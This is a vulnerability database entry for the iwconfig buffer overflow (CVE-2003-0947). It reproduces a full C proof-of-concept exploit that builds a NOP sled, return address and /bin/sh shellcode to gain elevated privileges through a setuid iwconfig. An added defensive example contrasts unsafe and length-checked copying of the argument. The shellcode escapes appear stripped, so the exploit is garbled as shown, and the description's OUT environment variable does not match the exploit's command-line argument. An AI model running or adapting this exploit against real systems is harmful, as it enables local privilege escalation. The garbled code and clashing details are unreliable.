iwconfig Buffer Overflow Vulnerability

Vulnerability ID: 1107543
Vulnerability type: Buffer overflow
Published: 2003-10-27
Updated: 2003-12-15
CVE ID: CVE-2003-0947
CNNVD-ID: CNNVD-200312-041
Platform: Linux
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/23301
https://www.securityfocus.com/bid/82721
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-041
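|Vulnerability details
iwconfig contains a buffer overflow vulnerability. When it is installed setuid, a local user can execute arbitrary code by means of an overly long OUT environment variable.
|Exploit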
source: http://www.securityfocus.com/bid/8901/info
  
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com
 */

/*
 * Greetz to Mixter,gorny,rave..
 */

/*
 * Description:
 *              iwconfig configures a wireless network interface and is similar to ifconfig
 *  except that iwconfig configures wireless interfaces.
 * Vulnerability:
 *               Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...
 */

/*
 * Yet another Proof Of Concept Xploit for 'iwconfig'
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */

#define BUFF_SIZE 98
#define RET 0xbffffc3f

char shellcode[]=
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";

int main(int argc,char **argv)
{

  int i;
  char *buff=(char *)malloc(sizeof(char)*BUFF_SIZE);

  for(i=0;i<BUFF_SIZE;i+=4)
    *(long *)&buff[i]=RET;

  for(i=0;i<BUFF_SIZE-strlen(shellcode)-12;i++)
    *(buff+i)=0x90;

  memcpy(buff+i,shellcode,strlen(shellcode));

  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);

  return 0;
}
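
The PoC above passes a 98-byte string where iwconfig expects an interface name. The following is an added example, not code from the original page or from the Wireless Tools source: it contrasts an unbounded copy of that argument with a length-checked one. The function names, the `IFNAME_MAX` constant (set to 16, the value of Linux `IFNAMSIZ`) and the sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define IFNAME_MAX 16   /* assumed buffer size, same value as Linux IFNAMSIZ */

/* Constructed stand-in for the flawed pattern: argv text copied into a
 * fixed-size name buffer with no length check. Shown only for contrast. */
void copy_ifname_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);   /* a 98-byte argument overruns a 16-byte buffer */
}

/* Hardened form: accept only non-empty names that fit, always terminate.
 * Returns 0 on success, -1 if the argument must be rejected. */
int copy_ifname_checked(char dst[IFNAME_MAX], const char *arg)
{
    const char *end;
    size_t len;

    if (arg == NULL)
        return -1;
    /* Look for the terminator within the first IFNAME_MAX bytes only. */
    end = memchr(arg, '\0', IFNAME_MAX);
    if (end == NULL)            /* no terminator in range: name too long */
        return -1;
    len = (size_t)(end - arg);
    if (len == 0)               /* empty name is not a valid interface */
        return -1;
    memcpy(dst, arg, len + 1);  /* len + 1 <= IFNAME_MAX, includes '\0' */
    return 0;
}

int main(void)
{
    char name[IFNAME_MAX];
    char oversized[98];         /* constructed input, same length as the PoC */

    memset(oversized, 'A', sizeof(oversized) - 1);
    oversized[sizeof(oversized) - 1] = '\0';

    printf("wlan0     -> %d\n", copy_ifname_checked(name, "wlan0"));
    printf("oversized -> %d\n", copy_ifname_checked(name, oversized));
    return 0;
}
```

A front end that rejects the argument before any copy takes place removes the overflow regardless of whether the binary is installed setuid.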
|Affected products
Wireless Tools For Linux Wireless Tools Version 26

Wireless Tools For Linux Wireless Tools Version 25

Wireless Tools For Linux Wireless Tools Version 24

Wireless Tools For Linux Wireless Tools Version 23

|References

Source: BUGTRAQ
Name: 20031112 iwconfig vulnerability - the last code was demaged sending by email
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=106867458902521&w=2